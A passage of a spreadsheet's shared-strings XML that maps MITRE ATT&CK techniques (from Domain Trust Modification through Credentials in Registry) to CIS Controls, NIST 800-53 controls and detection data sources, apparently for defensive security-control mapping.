    <t>T1484.002</t>
  </si>
  <si>
    <t>Domain Trust Modification</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>11.1,11.2,11.3,11.4,11.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CP-10,CP-2,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CP-10,CP-2,CP-6,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>3.12,4.1,4.7,5.3,5.4,6.1,6.2,6.8,12.2,12.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>4.1,11.1,11.2,11.3,11.4,11.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CM-6,CM-7,CP-10,CP-2,CP-7,CP-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,RA-9,SA-10,SA-11,SI-2,SI-7</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>7.6,7.7</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>4.2,7.6,7.7</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-8,CM-11,CM-2,CM-5,CM-6,CM-8,IA-2,RA-5,SA-10,SA-11,SC-16,SI-14,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>CA-8,CM-11,CM-2,CM-6,CM-8,RA-5,SA-10,SA-11,SI-14,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-2,CM-6,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>IIS Components</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,AC-6,CA-8,CM-11,CM-2,CM-6,CM-7,CM-8,IA-2,RA-5,SA-10,SA-11,SC-7,SI-14,SI-16,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification</t>
  </si>
  <si>
    <t>T1505.005</t>
  </si>
  <si>
    <t>Terminal Services DLL</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-9,RA-5,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Metadata, Image: Image Modification</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,14.1,14.2,14.3,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>AC-10,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,IA-2,IA-4,IA-5,IA-8,RA-5,SA-11,SA-15,SI-4</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>3.11,3.3,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,6.8,11.3,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,AC-7,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-3,IA-4,IA-5,IA-6,IA-8,RA-5,SC-28,SC-4,SC-7,SI-10,SI-12,SI-15,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>SC-23</t>
  </si>
  <si>
    <t>Instance: Instance Creation, Instance: Instance Metadata</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>3.3,4.2,4.4,4.7,5.3,6.1,6.2,6.8,13.4</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CM-5,CM-6,CM-7,IA-2,IA-3,IA-4,IA-8,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Metadata, Cloud Storage: Cloud Storage Modification, Network Traffic: Network Traffic Content, Snapshot: Snapshot Creation, Snapshot: Snapshot Metadata, Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>4.1,6.3,14.1,14.2,14.3,14.6,18.3,18.5</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-6,CA-7,CM-2,CM-6,IA-2,IA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,IA-8,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,IA-8,RA-9,SA-10,SA-11,SC-34,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Component Firmware</t>
  </si>
  <si>
    <t>Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>ROMMONkit</t>
  </si>
  <si>
    <t>4.1,13.3,13.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-7,RA-5,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>4.1,4.2,4.7,4.8,5.3,5.4,6.1,6.2,6.8,8.1,8.2,8.3,12.2,12.5,13.3,13.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-7,IA-8,RA-5,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,IA-2,IA-4,RA-5,SA-22,SI-16,SI-3,SI-4,SI-7</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</si>
  <si>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</si>
  <si>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T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-11,CM-2,CM-5,IA-2</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-3,CM-5,CM-6,IA-2,SA-22,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>Event Triggered Execution</t>
  </si>
  <si>
    <t>CM-2,CM-6,IA-9,SI-7</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,RA-5,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,SI-14,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,IA-9,SI-10,SI-2,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>2.5,4.1,4.2,12.2,12.7,13.5,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>CM-10,CM-6,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>CM-7,SI-10,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>2.6,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-7,SI-10,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>4.1,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,SI-2</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>2.7,4.1,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,CM-10,CM-2,CM-6,IA-9,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>T1546.016</t>
  </si>
  <si>
    <t>Installer Packages</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</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</si>
  <si>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</si>
  <si>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T1547.001</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>2.6,4.1</t>
  </si>
  <si>
    <t>CM-6,SC-39,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,AC-6,CA-7,CM-2,CM-5,CM-6,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>2.5,2.6,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,CM-7,IA-2,SI-10,SI-14,SI-16,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>2.5,2.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,10.1,10.2,10.7,13.2,13.7</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,IA-4,IA-8,RA-5,SI-10,SI-14,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>2.3,4.1,4.8,7.7,14.3,14.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-3,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>CM-2,CM-6,RA-5,SC-39,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-5,IA-2,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8,14.3,14.4</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-3,AC-6,CA-7,CM-2,CM-3,CM-5,CM-6,CM-7,SA-10,SA-11,SA-8,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.8</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CM-11,CM-2,CM-3,CM-5,CM-6,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>Active Setup</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>Login Items</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism</t>
  </si>
  <si>
    <t>2.5,3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-18,SC-34,SI-12,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,IA-2,RA-5,SI-2,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,SC-18,SC-34,SI-12,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>4.7,5.2,5.3,5.4,6.1,6.2</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>2.3,2.5,3.11,4.1,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-19,AC-20,CA-8,CM-10,CM-11,CM-2,CM-6,IA-2,IA-4,SC-28,SC-8,SI-12,SI-4,SI-7</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,6.1,6.2,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,SI-2</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>SC-23,SC-8,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.2,3.3,4.1,4.2,4.5,4.7,5.2,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,11.3,14.3,14.4,14.9,16.1,16.9,18.3,18.5,13.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-3,IA-4,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-10,SI-12,SI-15,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,5.4,6.1,6.2,6.8,14.3,14.4,14.9,16.1,16.9,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-5,CM-6,IA-2,IA-5,RA-5,SA-11,SA-15,SC-12,SC-28,SC-4,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
